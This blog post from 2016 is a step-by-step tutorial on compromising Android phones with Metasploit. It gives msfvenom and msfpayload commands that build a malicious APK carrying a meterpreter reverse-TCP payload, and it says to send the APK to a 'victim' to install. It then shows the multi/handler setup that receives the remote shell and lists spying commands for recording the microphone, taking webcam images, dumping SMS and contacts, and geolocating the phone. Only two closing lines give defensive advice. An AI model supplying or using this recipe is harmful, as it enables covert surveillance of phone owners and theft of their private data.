Friday, November 18, 2016

// //

How to hack android mobile phone | Hacking android

Anyone with proper knowledge to hacking can easily hack into anything. By hacking android mobile phone we means getting root access remotely over an android device. We can get our goal done by a lots of methods but what we are going to talk about here is by using metasploit in the kali linux OS. We will create our exploit or malicious apk via both methods.

Hacking android using msfvenom

1. open command terminal.

2. Set payload and create custom windows executable.
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST= LPORT=443 R > hack.apk

(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows :

root@kali:-# msfconsole

5. Now it's time to open and setup multi-handler. Follows the steps :
msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Payload Handler is being started........

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate

Hacking android using msfpayload

Attacker IP address:
Attacker port to receive connection: 443
1. Metasploit framework
2. Android smartphone

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is, below is our screenshot when executed the command.
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
set lhost –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it 
6.You can distibute the malicious apk using ways listed below which we will make tutorial for in our upcoming posts for now you can read the ways to distribute the app

There are more ways to install the apk on android which you can find via youtube or wait for them on our site.

7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code.